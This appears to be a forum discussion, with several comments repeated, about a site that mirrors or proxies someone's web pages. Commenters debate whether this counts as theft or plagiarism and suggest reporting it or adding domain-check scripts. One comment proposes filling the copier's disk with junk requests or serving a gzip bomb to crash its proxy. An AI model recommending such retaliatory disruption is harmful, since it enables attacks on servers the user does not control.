In other words nothing was stolen but a mirror/proxy was set up.
In a way that’s the same thing one pays cloudflare for and what Google does with cached URLs, or something archive.org etc du. I think some of the measures mentioned therefor would prevent that too.
And yes reporting to their DNS and/or housing provider is the right way to go. Of course depending on persistence it’s whack a mole. In the end one could download the whole website (just like your browser does) and upload it somewhere. On the topic of JS. An “attacker” could run a headless browser. That’s something some front end frameworks do/did for websites to be indexed by search engines.
So what you put in the internet people can download and upload or proxy in some form.
I think the better word is plagiarism. They are not pretending to be the author (good.com), they are trying to be another, better ranked, full of ads website (proxy.com) that happens to have the same content (it’s just plagiarized).
Couldn’t you put a little script on every page that checks window.location.href and, if the domain is wrong, sets it to the corresponding URL at the proper domain?
@OP could fill the scraper’s servers disk with junk by requesting randomly generated pages from the copy-cat website that would get cached each time. There’s also the option of a gzip bomb (in php, or with nginx) that could maybe make the caching proxy crash.
In other words nothing was stolen but a mirror/proxy was set up.
In a way that’s the same thing one pays cloudflare for and what Google does with cached URLs, or something archive.org etc du. I think some of the measures mentioned therefor would prevent that too.
And yes reporting to their DNS and/or housing provider is the right way to go. Of course depending on persistence it’s whack a mole. In the end one could download the whole website (just like your browser does) and upload it somewhere. On the topic of JS. An “attacker” could run a headless browser. That’s something some front end frameworks do/did for websites to be indexed by search engines.
So what you put in the internet people can download and upload or proxy in some form.
Insert obligatory “You wouldn’t steal a car” here
https://www.youtube.com/watch?v=HmZm8vNHBSU
The words “theft” and “steal” are inaccurate when duplication is essentially free and nobody lost their copy.
The correct word is probably impersonation. They are impersonating the author. In certain cases impersonation is indeed a crime.
I think the better word is plagiarism. They are not pretending to be the author (good.com), they are trying to be another, better ranked, full of ads website (proxy.com) that happens to have the same content (it’s just plagiarized).
Couldn’t you put a little script on every page that checks window.location.href and, if the domain is wrong, sets it to the corresponding URL at the proper domain?
It’s also important to remember that they’re sanitizing the scraped page to remove all javascript tags; scripting won’t work here
Sure, but some of the proxy / scrape methods are smart enough to rewrite your script as well.
@OP could fill the scraper’s servers disk with junk by requesting randomly generated pages from the copy-cat website that would get cached each time. There’s also the option of a gzip bomb (in php, or with nginx) that could maybe make the caching proxy crash.